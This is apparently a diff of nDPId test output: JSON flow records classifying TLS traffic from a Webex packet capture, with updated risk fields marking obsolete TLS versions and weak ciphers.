+00627{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570630272,"flow_last_seen":1444570630272,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"185.63.147.10","src_port":54651,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00570{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570630272,"flow_last_seen":1444570630272,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"185.63.147.10","src_port":54651,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00728{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570632436,"flow_last_seen":1444570633205,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2903,"flow_tot_l4_payload_len":4426,"flow_avg_l4_payload_len":316,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
-00715{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570638225,"flow_last_seen":1444570642072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3697,"flow_tot_l4_payload_len":5437,"flow_avg_l4_payload_len":319,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}}
-00728{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1444570636359,"flow_last_seen":1444570639256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":6215,"flow_avg_l4_payload_len":388,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
+00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570632436,"flow_last_seen":1444570633205,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2903,"flow_tot_l4_payload_len":4426,"flow_avg_l4_payload_len":316,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
+00821{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570638225,"flow_last_seen":1444570642072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3697,"flow_tot_l4_payload_len":5437,"flow_avg_l4_payload_len":319,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}}
+00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1444570636359,"flow_last_seen":1444570639256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":6215,"flow_avg_l4_payload_len":388,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
 00570{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640330,"flow_last_seen":1444570670371,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00570{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640338,"flow_last_seen":1444570670373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51135,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00732{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":105,"flow_first_seen":1444570669736,"flow_last_seen":1444570738301,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":13596,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
-00734{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":513,"flow_first_seen":1444570669745,"flow_last_seen":1444570732084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":29642,"flow_tot_l4_payload_len":316364,"flow_avg_l4_payload_len":616,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
-00729{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570674487,"flow_last_seen":1444570675890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
-00729{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1444570679512,"flow_last_seen":1444570680667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":5379,"flow_avg_l4_payload_len":233,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
-00729{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570693238,"flow_last_seen":1444570694561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
+00918{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":105,"flow_first_seen":1444570669736,"flow_last_seen":1444570738301,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":13596,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
+00920{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":513,"flow_first_seen":1444570669745,"flow_last_seen":1444570732084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":29642,"flow_tot_l4_payload_len":316364,"flow_avg_l4_payload_len":616,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
+00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570674487,"flow_last_seen":1444570675890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
+00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1444570679512,"flow_last_seen":1444570680667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":5379,"flow_avg_l4_payload_len":233,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
+00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570693238,"flow_last_seen":1444570694561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570732086,"flow_last_seen":1444570734115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51190,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00729{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570712008,"flow_last_seen":1444570716597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
+00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570712008,"flow_last_seen":1444570716597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
 00570{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570640382,"flow_last_seen":1444570699865,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33511,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1444570738415,"flow_last_seen":1444570742172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14319,"flow_tot_l4_payload_len":34572,"flow_avg_l4_payload_len":1440,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
+00920{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1444570738415,"flow_last_seen":1444570742172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14319,"flow_tot_l4_payload_len":34572,"flow_avg_l4_payload_len":1440,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
 00571{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1444570640385,"flow_last_seen":1444570699915,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":980,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1444570738419,"flow_last_seen":1444570738426,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51195,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00728{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1444570636364,"flow_last_seen":1444570640403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":6215,"flow_avg_l4_payload_len":345,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
+00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1444570636364,"flow_last_seen":1444570640403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":6215,"flow_avg_l4_payload_len":345,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
 00568{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640310,"flow_last_seen":1444570645707,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37139,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00572{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1444570699916,"flow_last_seen":1444570700460,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00572{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1444570700561,"flow_last_seen":1444570713719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1375,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00571{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1444570700563,"flow_last_seen":1444570713710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":980,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1444570713719,"flow_last_seen":1444570715293,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1011,"flow_avg_l4_payload_len":77,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00729{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570636170,"flow_last_seen":1444570639257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7020,"flow_avg_l4_payload_len":501,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
-00730{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1444570636252,"flow_last_seen":1444570640344,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2842,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":305,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
+00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570636170,"flow_last_seen":1444570639257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7020,"flow_avg_l4_payload_len":501,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
